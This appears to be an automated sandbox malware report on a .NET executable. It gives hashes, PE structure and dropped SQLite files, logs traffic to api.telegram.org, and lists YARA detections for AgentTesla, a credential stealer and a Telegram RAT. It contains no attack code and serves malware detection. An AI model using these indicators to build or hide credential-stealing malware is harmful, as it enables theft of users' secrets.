                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\96b2b7229c43d2712ff1bf4906a723f6\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\5a5dc2f9e9c66b74d361d490
                          Process:C:\Users\user\Desktop\widnOAntje.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 36, database pages 24, 1st free page 14, free pages 11, cookie 0x5, schema 4, UTF-8, version-valid-for 36
                          Category:dropped
                          Size (bytes):98304
                          Entropy (8bit):2.9216957692876595
                          Encrypted:false
                          SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                          MD5:1A706D20E96086886B5D00D9698E09DF
                          SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                          SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                          SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\widnOAntje.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 7, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):2.3172897780113213
                          Encrypted:false
                          SSDEEP:96:oNwCz2C+NR73QOaq9kozeav2RT3VnnnekEEN9ORelnasL:ouZC+NJLaqe0LUTpnn1DN9OROnj
                          MD5:D5ECE7413F423743B368D55921D78C0A
                          SHA1:3F1E854E373FB2F9BFD868AF38AF5C6B3CD2A71D
                          SHA-256:D38D8A693CD4B718EA9E4995939262749893878EE9A0931BEB0F33781979FD77
                          SHA-512:F54CAB99D2795DF2D01E54D1E1184D116A56E8053140BAF868ADBFC7EE35EFBC59F83E3FF26C84E0D6D1A118BB79CAB82527F1502D328483953A0A58BEED8E0B
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\widnOAntje.exe
                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                          Category:dropped
                          Size (bytes):98304
                          Entropy (8bit):0.08231524779339361
                          Encrypted:false
                          SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                          MD5:886A5F9308577FDF19279AA582D0024D
                          SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                          SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                          SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.604490455328884
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:widnOAntje.exe
                          File size:950784
                          MD5:4d5ea75ef0273df2b1e2463dd7472cf1
                          SHA1:cdd8e983ba556f08faf43b29dcdc134658c39b55
                          SHA256:0b3b2b8094ce254dcd224e91a84b116e806b8cc7fc895fed43cf9ea350743338
                          SHA512:48a50cdd055dc5ab9e9774b72c76f630eb6e0ce4090da9a1d5b7cbdf0f9397d69101affc5f14a76ad66435f0f6b65922196a21bc2996ff9081b85a28b16db20b
                          SSDEEP:12288:zbfcmhVDQlRn34LAkkgnlST9R/zUp73YmEY4UKiej/d4WYqyOLKOeU+9E1ExzPr7:PF434LAkk2Yz673YGc/dxYqy4KmEu6
                          TLSH:31157C8533B19473E99A057B0534A49E1D39A10BB09BF33ABA273741E20057BB77EF91
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9...............0..x............... ........@.. ....................................@................................
                          Icon Hash:00828e8e8686b000
                          Entrypoint:0x4e9612
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xC839C00D [Fri Jun 12 22:51:57 2076 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          shr byte ptr [eax+00005500h], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe95c00x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x5ac.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0xe95a40x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xe76200xe7800False0.8233613576538877data7.606320578559565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xea0000x5ac0x600False0.4212239583333333data4.078781937836637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xec0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          RT_VERSION0xea0900x31cdata
                          RT_MANIFEST0xea3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                          DLLImport
                          mscoree.dll_CorExeMain
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 20, 2023 18:27:58.758272886 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.758358002 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.758622885 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.814476967 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.814510107 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.862833977 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.863112926 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.865655899 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.865681887 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.866009951 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.921283007 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.925597906 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.945740938 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.946321964 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.946414948 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.946544886 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.946795940 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.946861982 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:58.947051048 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:58.947122097 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:59.050021887 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:59.050322056 CET44349838149.154.167.220192.168.11.20
                          Mar 20, 2023 18:27:59.050510883 CET49838443192.168.11.20149.154.167.220
                          Mar 20, 2023 18:27:59.052402020 CET49838443192.168.11.20149.154.167.220
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 20, 2023 18:27:58.741096973 CET5778653192.168.11.201.1.1.1
                          Mar 20, 2023 18:27:58.750574112 CET53577861.1.1.1192.168.11.20
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 20, 2023 18:27:58.741096973 CET192.168.11.201.1.1.10x8b4dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 20, 2023 18:27:58.750574112 CET1.1.1.1192.168.11.200x8b4dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                          • api.telegram.org

                          Click to jump to process

                          Target ID:1
                          Start time:18:26:07
                          Start date:20/03/2023
                          Path:C:\Users\user\Desktop\widnOAntje.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\widnOAntje.exe
                          Imagebase:0x6b0000
                          File size:950784 bytes
                          MD5 hash:4D5EA75EF0273DF2B1E2463DD7472CF1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:low

                          Target ID:5
                          Start time:18:27:46
                          Start date:20/03/2023
                          Path:C:\Users\user\Desktop\widnOAntje.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\widnOAntje.exe
                          Imagebase:0xe60000
                          File size:950784 bytes
                          MD5 hash:4D5EA75EF0273DF2B1E2463DD7472CF1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          No disassembly